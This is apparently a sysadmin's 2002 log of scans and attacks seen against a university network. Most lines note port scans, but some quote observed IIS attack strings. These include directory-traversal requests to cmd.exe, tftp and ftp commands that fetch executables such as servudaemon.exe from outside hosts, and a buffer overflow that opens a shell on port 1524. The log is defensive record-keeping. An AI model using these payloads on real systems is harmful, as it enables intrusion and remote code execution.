Short summary of some of the attacks against us for Mar. 2002


 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/03/01-00:25:31.74 211.55.33.54 (korea crap) scannet for port 21
2002/03/01-00:25:32.51 211.55.33.54 (korea crap) scnnet for port 21
2002/03/01-05:43:47.79 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216:6346 4x/min til 23:30:11.81
2002/03/01-07:46:28.92 213.252.151.4  (BCC GmbH,DE) probe 132.235.3.133:515,25,22
2002/03/01-07:59:15.98 207.218.211.175 (twhou-211-175.ev1.net) (traceroute?) probe 132.235.3.133:3573[0-05]
2002/03/01-08:58:08.91 213.252.151.56 (BCC GmbH,DE) probe 132.235.3.133:80,21
2002/03/01-09:24:54.98 80.14.26.173 (Marseille-103-1-2-173.abo.wanadoo.fr) access hacker ftp daemon..
2002/03/01-10:47:01.78 213.252.151.50 (BCC GmbH,DE) probe 132.235.3.133:110
2002/03/01-11:16:48.21 213.252.151.57 (BCC GmbH,DE) probe 132.235.3.133:3306,21
2002/03/01-11:24:44.24 217.136.135.37 (adsl-67365.turboline.skynet.be) syn scannet for port 21
2002/03/01-11:33:08.04 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) attack IIS server w/ tftp+-i+217.128.85.107+get+servudaemon.exe+c:\Inetpub\scripts\servudaemon.exe
2002/03/01-11:42:51.92 132.235.197.131 (hardnoc3.cns.ohiou.eduP scannet ofr port 161
2002/03/01-11:46:04.90 213.252.151.3 (BCC GmbH,DE) probe 132.235.3.133:515,25
2002/03/01-12:13:59.27 200.177.152.129 (dl-rip-C8B19881.sao.terra.com.br) probe 132.235.3.133 : 6000
2002/03/01-12:13:59.27 213.252.151.44 (BCC GmbH,DE) probe 132.235.3.133:6000
2002/03/01-12:39:19.01 213.252.151.24 (BCC GmbH,DE) probe 132.235.3.133:113,110,3306
2002/03/01-12:51:31.01 132.248.69.23 (ceniza.cenapred.unam.mx) probe 132.235.3.43 : 80
2002/03/01-13:47:25.15 132.235.203.66 (modem-203-066.dialnet.ohiou.edu) try to use ldap to login to net for cob.ohiou.edu net
2002/03/01-14:29:34.30 134.160.21.241 (itblvpn-pool2.riken.go.jp) probe 132.235.3.133:119
2002/03/01-14:29:34.30 213.252.151.54 (BCC GmbH,DE) probe 132.235.3.133:119,110
2002/03/01-14:46:28.65 61.252.53.132 (korea crap) scannet for port 22
2002/03/01-15:12:16.61 213.252.151.44 (BCC GmbH,DE) probe 132.235.3.133:21
2002/03/01-15:47:06.10 217.135.30.22 (modem-1046.articuno.dialup.pol.co.uk) bang on 132.235.19.125:6346 til 15:56:21.80
2002/03/01-15:50:52.16 139.182.163.171 (dns.cbpa.csusb.edu) scannet for port 21
2002/03/01-16:03:49.66 217.135.10.187 (modem-1211.aerodactyl.dialup.pol.co.uk) bang on 132.235.19.125:6346 til 18:01:28.57
2002/03/01-16:29:32.79 198.93.73.9 (QX.net, Inc.,KY,US) scannet for port 21
2002/03/01-16:46:07.17 213.252.151.49 (BCC GmbH,DE) probe 132.235.3.133:79,143
2002/03/01-17:01:25.20 213.252.151.49 (BCC GmbH,DE) probe 132.235.3.133:110,21,119
2002/03/01-17:04:05.41 64.26.175.178 (www.bridgewaterretreat.ca) probe 132.235.3.133:21
2002/03/01-18:23:06.96 148.243.48.158 (MIPROTEC SOLUCIONES SA DE CV, MX) scannet for port 6112
2002/03/01-18:48:56.31 213.252.151.27 (BCC GmbH,DE) probe 132.235.3.133:21
2002/03/01-18:57:35.31 213.252.151.54 (BCC GmbH,DE) probe 132.235.3.133:514,79,110,143
2002/03/01-18:59:52.30 200.175.166.62 (a62-1-2.pmj.gvt.net.br) probe 32.235.3.133 : 79 
2002/03/01-19:54:51.73 209.193.31.228 (209-193-31-228-cdsl-rb1.nwc.acsalaska.net) bang on 132.235.19.144 : 6346 til 13:56:00.35
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 1. attack iis server w multiplt buff overlfow cmds, such as:
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 2. copy+c:\winnt\system32\cmd.exe+c:\temp\cmd2.exe
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 3. cmd.exe?/c+mkdir+c:\temp\VALUEADD\MSFT\GMT\files
2002/03/01-20:10:06.92 213.252.151.37 (BCC GmbH,DE) probe 132.235.3.133:6000
2002/03/01-20:54:59.67 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 til 2002/03/02-05:54:55.66 1x/min
2002/03/01-21:52:36.40 137.165.35.202 (jrc-djacobso.williams.edu) probe 132.235.3.133 : 143
2002/03/01-21:52:36.40 213.252.151.31 (BCC GmbH,DE) probe 132.235.3.133:143,3306
2002/03/01-22:30:42.74 213.252.151.50 (BCC GmbH,DE) probe 132.235.3.133:22,514
2002/03/01-22:35:36.08 217.227.53.247 (pD9E335F7.dip.t-dialin.net) scannet for port 80,1433,ping scan of net
2002/03/02-03:59:45.54 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) attck iis server w/buff overflow
2002/03/02-05:55:27.13 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 all day 1x/momin
2002/03/02-06:29:42.20 65.165.168.82 (ONE CLIQ COMMUNICATIONS,IL,US) probe 132.235.3.7 : 6346
2002/03/02-09:22:10.96 198.252.132.227 (Design Automation,CA,US) scannet for port 21
2002/03/02-12:32:02.70 213.65.0.126 (h126n1fls31o826.telia.com) scannet for port 21
2002/03/02-18:45:37.81 66.37.192.43 (Exodus BENGI,CA,US) probe 132.235.3.31 : 3072
2002/03/02-18:45:57.71 66.37.192.43 (Exodus BENGI,CA,US) probe 132.235.3.70 : 1024 
2002/03/03-05:21:25.44 193.170.188.243 (aurora.uni-ak.ac.at) join the iis attack party
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 1. attack IIS server w/ command:
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 2. copy+c:\winnt\system32\cmd.exe+C:\InetPub\scripts\sensepost.exe%22
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 3. GET /fdisk.exe?/c+echo+open+131.155.71.104+63666+>+c:\ftp.txt HTTP/1.0
2002/03/03-05:37:24.25 212.168.37.23 (burg.serverdienst.de) scannet for port 21
2002/03/03-05:58:01.15 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 all day 1x/momin
2002/03/03-06:14:47.09 209.173.195.254 (chateau.cpe.orbis.net) scannet ofr port 21
2002/03/03-07:54:20.42 4.36.0.5 (mungojerrie.gridcom.net) scannet for port 22
2002/03/03-08:25:45.14 213.25.48.195 (TopNet sp. z o.o. O/Wroclaw,P:) scannet for port 111, statdx exploit
2002/03/03-14:36:49.68 172.130.236.19 (AC82EC13.ipt.aol.com) bang on 132.235.3.246 : 6346 til 16:06:33.73
2002/03/03-15:46:22.93 132.235.19.185 (dhcp-019-185.cns.ohiou.edu) scannet for port 12345
2002/03/03-19:55:59.77 172.156.69.10 (AC9C450A.ipt.aol.com)  bang on 132.235.3.246 : 6346 til 21:59:10.70
2002/03/03-22:00:23.26 213.194.65.37  (ender.eecs.uic.edu) scannet for port 22
2002/03/03-22:46:54.64 212.100.183.27 (212-100-183-27.adsl.easynet.be)scannet for port 21
2002/03/04-02:13:41.49 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) syn scan of net for prt 80
2002/03/04-03:40:18.67 213.106.204.138 (public1-runc1-4-cust138.manc.broadband.ntl.com) syn scan of net for prt 80
2002/03/04-06:32:26.46 217.120.238.87 (cc198330-a.borne1.ov.nl.home.com) scannet for port 21
2002/03/04-07:19:50.97 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/04-07:41:22.58 217.136.81.16 (adsl-53520.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/04-08:18:32.24 213.51.108.119 (cc26927-b.hnglo1.ov.nl.home.com) scannet for port 21
2002/03/04-13:05:28.61 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/04-13:06:22.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 514
2002/03/04-13:13:45.53 217.136.64.233 (adsl-49385.turboline.skynet.be) scannet for port 21
2002/03/04-13:53:04.02 216.168.231.240 (h240.s231.netsol.com) scan serveral ips for port 33454
2002/03/04-14:33:16.00 132.235.18.150 (ent.ohiou.edu) scnanet for port 12345
2002/03/04-16:13:00.20 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) attack iis server with tftp command again...
2002/03/04-16:55:48.48 209.209.129.35 (Commonwelath Credit Union,KY,US) scannet for port 21
2002/03/04-20:29:42.68 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) portscan various ips ports 21,25,80,110,119,6588
2002/03/04-23:23:57.99 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan partial net for porrt 139
2002/03/04-23:28:12.86 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan net with ping
2002/03/05-00:27:48.60 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) portscan various ips  ports 21,25,80,110,119,6588
2002/03/05-00:33:48.89 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan net for porrt  137
2002/03/05-01:50:53.09 172.140.33.242 (AC8C21F2.ipt.aol.com) bang on  132.235.3.246 : 6346 til 02:02:56.88
2002/03/05-06:57:30.76 217.128.205.59 (AMontpellier-201-1-4-59.abo.wanadoo.fr) scannet for port 21
2002/03/05-07:13:29.44 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/05-09:04:07.95 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) bang on 132.235.16.8 ports 4050, 80
2002/03/05-09:17:06.50 132.235.197.131 (hardnoc3.cns.ohiou.edu) scnanet for port 161
2002/03/05-09:57:05.01 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/05-10:57:35.35 217.136.64.233 (adsl-49385.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/05-11:10:14.77 132.235.197.29 (netmgt1.cns.ohiou.edu) scannet on port 161
2002/03/05-13:07:44.18 61.222.93.253 (61-222-93-253.HINET-IP.hinet.net) scannet for port 21
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/05-15:25:59.79 213.88.204.119 (Infiniteloop AB,SE) scannet for port 21
2002/03/05-15:31:48.61 217.136.66.82 (adsl-49746.turboline.skynet.be) scannet for port 21, anon ftpattacks
2002/03/05-16:38:05.67 132.235.197.29 (netmgt1.cns.ohiou.edu) scannet on port 161
2002/03/05-17:29:48.63 172.175.34.136 (ACAF2288.ipt.aol.com) bang on 132.235.3.246 : 6346  til 18:08:37.57
2002/03/05-19:00:17.40 217.136.162.63 (adsl-74303.turboline.skynet.be) scannet for port 21, , anon ftp attacks
2002/03/05-19:49:45.11 80.11.245.121 (APh-Aug-103-1-4-121.abo.wanadoo.fr) scannet for port 21`
2002/03/05-19:58:13.30 80.11.245.121 (APh-Aug-103-1-4-121.abo.wanadoo.fr) scannet for port 137
2002/03/05-21:06:33.04 132.235.19.195 (dhcp-019-195.cns.ohiou.edu) scannet for port 12345
2002/03/05-22:14:38.09 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on  132.235.4.26 : 6346 til 2002/03/06-05:37:23.45
2002/03/06-00:16:31.22 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) pound on 132.235.3.216 : 6346 til 2002/03/06-05:43:51.12
2002/03/06-00:38:53.74 146.20.33.71 (proxy1.monitor.dal.net-Chodey & Co.,Nj,US) scan 132.235.19.140 ports 8080,3128,80,1080,23,81,81,3128
2002/03/06-03:05:22.32 65.170.112.3 (dns1.matrixstudio.net) scannet with ping, then for port 80 attacks
2002/03/06-05:44:00.09 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216 : 6346 til 15:13:21.49
2002/03/06-05:49:14.95 202.98.197.135:22 (mail.gzgov.gov.cn) conn to ports 1024, 3072, others on rand ips
2002/03/06-07:25:05.15 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-09:43:34.15 209.51.193.16 (openrelaywatch.org) scannet for port 25
2002/03/06-11:55:08.01 132.235.94.25 (someplace secret@ohiou.edu) scannet for port 139
2002/03/06-14:00:57.04 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-14:20:22.64 193.170.188.243 (aurora.uni-ak.ac.at) 1. attack IIS server w/command:
2002/03/06-14:20:22.64 193.170.188.243 (aurora.uni-ak.ac.at) 2. cmd.exe?/c+ping+-v+udp+-n+2000+-l+62000+-w+0+c-889b70d5.012-36-6b73642.cust.bredbandsbolaget.se HTTP/1.0
2002/03/06-16:37:36.30 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) probe 132.235.2.114 prots 1080,8080,3128,81,23
2002/03/06-18:01:14.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/06-20:16:54.04 132.235.90.7 (someplace secret@ohiou.edu) scannet for ports139, 38293
2002/03/06-20:41:23.01 216.190.255.220 (Wasatch Hosting,UT,US) scannet for port 25
2002/03/07-05:18:14.63 218.7.43.253 (Harbin Engineering University 1,CN) attack our ip via port 139 - nimba
2002/03/07-05:50:11.09 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on  132.235.4.26 : 6346 til 2002/03/08-05:59:49.43
2002/03/07-05:52:32.55 64.61.25.140 (host4-limewire.colo.ny.np1.net) scan various ips for prt 6346
2002/03/07-06:05:46.98 216.218.208.66 (Geekz Corporation,AU) scan several ips for ports 80,8080
2002/03/07-06:34:30.84 217.81.164.68 (pD951A444.dip.t-dialin.net) scannet for port 21, anon ftp attacks
2002/03/07-06:34:42.35 217.81.164.68 (pD951A444.dip.t-dialin.net) scannet for port 21
2002/03/07-07:07:59.20 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/07-10:47:44.36 63.125.18.88 (ip-125-18-88.phx.extremezone.com) conn to 132.235.3.143 : 6346
2002/03/07-12:40:17.77 24.208.178.80 (dhcp024-208-178-080.columbus.rr.com) probe ports 512,514 on 2 ips.
2002/03/07-16:12:43.60 172.135.101.35 (AC876523.ipt.aol.com) bang on 132.235.3.246 : 6346 til 17:18:49.55
2002/03/07-16:30:48.03 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) scan net for port 137
2002/03/07-17:58:46.72 217.136.157.172 (adsl-73132.turboline.skynet.be) scannet for port 21
2002/03/07-20:42:51.51 64.12.180.[,8,9,16,17,18,72] (home-s61.websys.aol.com) probe 132.235.2.114 til 2002/03/07-22:16:52.13
2002/03/07-23:44:24.45 64.12.180.[8,9,16] (home-s62.websys.aol.com) probe 132.235.18.24 til 2002/03/08-04:39:14.18
2002/03/08-02:44:30.04 132.235.238.1 (admin.memaud.ohiou.edu) scannet for port 38293 UDP  
2002/03/08-03:13:30.97 195.168.209.150 (gw1.husqvarna.sk) scannet for port 22
2002/03/08-07:40:48.87 204.123.28.43 (crawler3.archive.org) 1. scan port 80 with cmds like:
2002/03/08-07:40:48.87 204.123.28.43 (crawler3.archive.org) 2. GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/08-09:31:35.04 144.134.145.80 (CTPP-p-144-134-145-80.prem.tmns.net.au) scannet for port 25
2002/03/08-13:27:00.80 212.31.250.9 (Colt Hosting Center Pvlan 1,MILAN,IT) scannet for port 80
2002/03/08-13:38:44.35 130.228.230.161 (proxy6.monitor.dal.net-Netcetera,DK) scan ip for port 1080,80.3128,81,,8080,23,8081
2002/03/08-16:10:57.42 80.200.144.123 (80-200-144-123.adsl.powered-by.skynet.be) scannet for port 21
2002/03/08-17:24:12.82 66.28.98.4 (Alexa.com) scan port 80 w/ GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe HTTP/1.0
2002/03/08-21:17:10.23 172.162.6.212 (ACA206D4.ipt.aol.com) bang on 132.235.3.246 : 6346 til 2002/03/09-01:29:40.04
2002/03/08-21:42:46.17 172.168.219.24 (ACA8DB18.ipt.aol.com) bang on 132.235.3.246 : 6346 til 2002/03/08-23:04:35.87
2002/03/08-23:11:37.68 146.115.22.101 (RCN Corporation,NJ,US) scannet for port 1433
2002/03/09-03:13:00.82 193.253.231.145 (ALyon-202-1-1-145.abo.wanadoo.fr) portscan 132.235.17.156 ports 6000,80
2002/03/09-05:05:11.40 163.239.25.89 (eemmi.sogang.ac.kr) scannet for port 21
2002/03/09-05:10:52.46 163.239.25.89 (eemmi.sogang.ac.kr) scan selected ips for port 21
2002/03/09-06:33:54.44 62.29.133.212 (Mobil Only,DE) scannet for port 80
2002/03/09-08:12:15.54 66.28.98.5 (Alexa.com) scan port 80 w/ GET /scripts/..%5c..%5cwinnt/system32/cmd.exe HTTP/1.0
2002/03/09-21:39:45.47 162.83.136.103 (pool-162-83-136-103.ny5030.east.verizon.net) scannet for port 12345
2002/03/09-23:38:54.68 217.82.183.232 (pD952B7E8.dip.t-dialin.net) scannet w/ ping
2002/03/10-01:27:07.81 68.65.96.186 (md-wstmstr-cuda1-c1a-186-a.wmnsmd.adelphia.net) scannet for port 80
2002/03/10-02:06:40.41 211.133.254.6 (6.jln-net.) scannet for port 22
2002/03/10-03:01:57.54 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scan several ips for port 53,135,1031
2002/03/10-03:03:02.98 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scannet for port 53,135,1031
2002/03/10-03:55:15.33 218.25.46.136 (CHINANET liaoning province network,CN) portscan 132.235.1.5 139,27374 ,12345
2002/03/10-04:22:08.76 132.208.224.122 (Universite du Quebec a Montreal,CA) scannet for port 21
2002/03/10-07:35:16.04 216.190.255.225 (Wasatch Hosting,UT,US) scannet for port 25,137
2002/03/10-09:24:40.40 80.13.211.246 (ALille-104-1-2-246.abo.wanadoo.fr) scannet for port 1433,139,.137,445
2002/03/10-10:17:08.19 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scannet with ping
2002/03/10-10:17:13.97 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scan net for port 5800
2002/03/10-15:55:12.91 216.170.193.77 (hame0pool0-a76.me.tds.net) scannet for port 21
2002/03/10-15:55:22.07 64.230.154.196 (HSE-Kitchener-ppp232809.sympatico.ca) scannet for port 1025
2002/03/10-20:41:49.28 24.27.182.14 (cvg-27-182-14.cinci.rr.com) scannet for port 12345
2002/03/10-21:22:58.81 216.68.29.130 (Fuse Internet Access,OH,US) scannet for port 22
2002/03/10-21:24:37.67 194.204.49.37 (telx-gw.uninet.ee) ssh CRC32 overflow NOOP attacks til 23:08:55.50
2002/03/11-01:58:15.35 193.253.217.68 (AMarseille-201-1-2-68.abo.wanadoo.fr) scannet for port 21
2002/03/11-05:53:24.61 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21
2002/03/11-05:56:08.11 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21
2002/03/11-07:51:42.27 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port161 UDP
2002/03/11-08:56:18.05 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/11-11:47:56.22 61.251.164.22 (korea crap) scannet for port 80
2002/03/11-12:43:10.25 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/11-14:08:59.02 217.228.61.245 (D9E43DF5.dip.t-dialin.net) scannet for port 80
2002/03/11-14:09:51.03 217.228.61.245 (pD9E43DF5.dip.t-dialin.net) scannet for port 80
2002/03/11-14:41:41.38 216.110.167.58 (CyberGate, Inc.,FL,US) scannet for port 21
2002/03/11-17:05:34.03 132.235.96.62 (dhcp-096-062.cns.ohiou.edu) scannet for port 139,80
2002/03/12-04:42:53.13 61.177.254.66 (CHINANET Jiangsu province network,CN) scan net for port 80
2002/03/12-05:19:42.23 24.203.32.97 (modemcable097.32-203-24.cap.mc.videotron.ca) scannet for ports 445,139,137
2002/03/12-07:31:44.03 216.190.255.225 (Wasatch Hosting,UT,US) scannet for port 25

2002/03/12-06:27:25.87 132.241.23.238 (lang238-c.dhcp.CSUChico.EDU) 2358 attacks on IIS servers thru 14:29:59.06
2002/03/12-07:11:50.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/12-07:42:24.22 132.235.90.7 (?.ohiou.edu) scannet for port 38293
2002/03/12-08:05:18.47 216.210.223.210 (American States Title,OR,US) scan 132.235.201.2 port 1524, buff overflow attack 6112
2002/03/12-08:39:25.54 216.210.223.210 (American States Title,OR,US) second probe/attack on 216.210.223.210
2002/03/12-08:49:17.11 216.210.223.210 (American States Title,OR,US) scan 132.235.1.252 for port 1524 (ingreslock)
2002/03/12-08:49:17.27 216.210.223.210 (American States Title,OR,US) attack 132.235.1.252:6112 buff overflow - start sh on port 1524
2002/03/12-09:25:05.50 216.210.223.210 (American States Title,OR,US) third probe/attack on 216.210.223.210, + others
2002/03/12-09:34:41.87 216.210.223.210 (American States Title,OR,US) second probe/attack on 132.235.1.252
2002/03/12-10:44:26.39 216.210.223.210 (American States Title,OR,US) third probe/attack on 132.235.1.252
2002/03/12-12:03:25.96 61.75.59.10 (korea crap) scannet for port 21
2002/03/13-02:01:27.94 10.10.51.240 (MAC addr 0:b0:8e:85:3d:50-CNSs router-haha) scan net for port 111
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 1. start of web scans that include GET commands such as:
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 2.GET /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 3.GET /scripts..%c1%9c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 4.GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-07:54:43.25 62.226.70.118 (p3EE24676.dip.t-dialin.net) scannet for port 80
2002/03/13-08:07:01.69 62.226.70.118 (p3EE24676.dip.t-dialin.net) scannet for port 80
2002/03/13-12:40:55.56 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan several ips for port 524
2002/03/13-13:44:00.33 198.234.252.9 (oarnet, somewhere...) try to login to 132.235.1.252:21  69 times
2002/03/13-15:22:02.32 210.95.24.130 (korea crap) scannet for port 21
2002/03/13-18:52:10.96 208.252.19.40 (hotjobs, NY,NY,US) bang on 132.235.1.1 (traceroute?spray?) potrts from 33435-33445 til 18:57:27.15
2002/03/13-21:27:54.62 213.93.55.123 (e55123.upc-e.chello.nl) scannet for port 80
2002/03/13-21:37:52.21 198.234.250.151 (oarnet, somewhere...) scannet for port 80
2002/03/14-00:19:45.82 208.210.144.209 (209.144.210.208.pro-ns.net) scan selected ips for port 21
2002/03/14-11:09:44.44 62.4.67.98 (62.4.67.98.not.updated.abovenet.de) scannet several ips for port 1024,3072
2002/03/14-11:11:27.85 217.128.85.160 (ALyon-202-1-2-160.abo.wanadoo.fr) scannet for port 21
2002/03/14-11:15:43.49 62.4.67.75 (62.4.67.75.not.updated.abovenet.de) scannet several ips for port 1024,3072
2002/03/14-13:23:29.08 206.117.136.39 (DSL039.LABridge.com) scannet for port 111 +buff overflow attacks
2002/03/14-13:24:45.52 217.225.17.231 (pD9E111E7.dip.t-dialin.net) scannet for port 119
2002/03/14-13:25:28.07 217.0.63.102 (pD9003F66.dip.t-dialin.net) scannet for port 80
2002/03/14-14:31:53.02 206.228.51.3 (fun1.clmb.edge.net) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-14:31:53.02 206.228.51.3 (fun1.clmb.edge.net) 2. ftp to 136.142.118.119 user GRAVE to get Serv-U32.exe
2002/03/14-21:22:19.98 61.171.94.140 (CHINANET Shanghai province network) scan net for ports 8080,80,1080,3128,8000
2002/03/14-21:42:53.28 61.177.253.22 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-21:42:53.28 61.177.253.22 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-21:54:24.91 61.177.246.149 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-21:54:24.91 61.177.246.149 (CHINANET Jiangsu province network)2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-22:40:15.49 24.161.35.102 (cm-24-161-35-102.nycap.rr.com) scannet for port 27374
2002/03/14-22:46:14.13 217.82.224.110 (pD952E06E.dip.t-dialin.net) scannet for port 21

2002/03/14-23:22:10.46 61.177.246.223 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-23:22:10.46 61.177.246.223 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-23:41:05.45 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scannet for port 21
2002/03/15-01:06:22.56 61.177.253.209 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/15-01:06:22.56 61.177.253.209 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/15-03:40:35.70 212.179.239.73 (bzq-239-73.red.bezeqint.net) scannet with ping
2002/03/15-13:48:40.00 172.181.249.142 () scannet for port 21
2002/03/15-14:44:32.87 207.239.248.92 () probe net w/ icmp address mask request
2002/03/15-15:06:49.71 207.239.248.92 () probe net for port 1080,8080
2002/03/15-15:08:00.24 207.239.248.92 () scannet for port 3128 (squid?)
2002/03/15-15:31:42.24 207.239.248.92 () probe sambe clientaccess on several ips
2002/03/15-15:50:12.72 207.239.248.92 () probe port 111 - portmap list
2002/03/15-16:12:12.00 172.181.213.27 () scannet for port 21
2002/03/15-18:49:05.65 207.239.248.92 () probe net w/ icmp timestamp request
2002/03/16-03:43:57.89 218.50.3.26 () statdx attack
2002/03/16-11:40:25.79 161.58.176.4 () scannet for ports (445,139,137)
2002/03/16-21:02:38.00 198.187.135.15 () scannet for port 21
2002/03/16-21:03:21.00 198.234.250.151 ()  scannet for port 21
2002/03/17-07:43:43.15 212.179.238.83 () scannet for port  1433, anon ftp attacks
2002/03/17-09:07:21.46 172.180.124.18 () scannet for port 21
2002/03/17-10:20:33.54 216.30.34.112 () scannet for port 21
2002/03/17-16:00:15.79 161.58.176.4 () scannet for ports (445,139,137)
2002/03/17-20:04:23.64 12.236.44.178 () scannet for port 21
2002/03/17-23:30:07.59 209.1.6.4 () 1. attack IIS servers w/ buff overflow cmds.
2002/03/17-23:30:07.59 209.1.6.4 () 2. tftp.exe/?+-i+209.1.6.4+GET+2.tmp+c:/recycler/_/_tmp/2
2002/03/18-02:22:11.42 61.120.44.20 () scannet for port 21
2002/03/18-10:40:46.75 216.56.20.215 () scannet for port 21
2002/03/18-12:12:58.83 62.163.86.119 (a86119.upc-a.chello.nl) scannet for port 21
2002/03/18-13:49:39.03 66.45.30.103 () scannet with ping
2002/03/18-14:24:24.36 211.177.141.29 () scannet for port 21
2002/03/18-16:11:47.08 64.157.1.30 () scannet for port 21
2002/03/18-20:16:33.65 155.230.152.166 () scannet for port 21
2002/03/18-23:53:36.04 61.10.25.110 () scannet for port 21
2002/03/19-06:43:20.67 24.164.248.46 () scannet for ports 3128,8080
2002/03/19-13:05:58.89 80.133.105.180 () scannet for port 21
2002/03/19-13:54:40.31 62.4.67.145 () scannet for ports 1024, 2072
2002/03/19-14:55:11.97 207.71.92.221 () portscan 132.235.18.248 - 139,443,445,5000,21,23,25,79,80,110,113,135,143
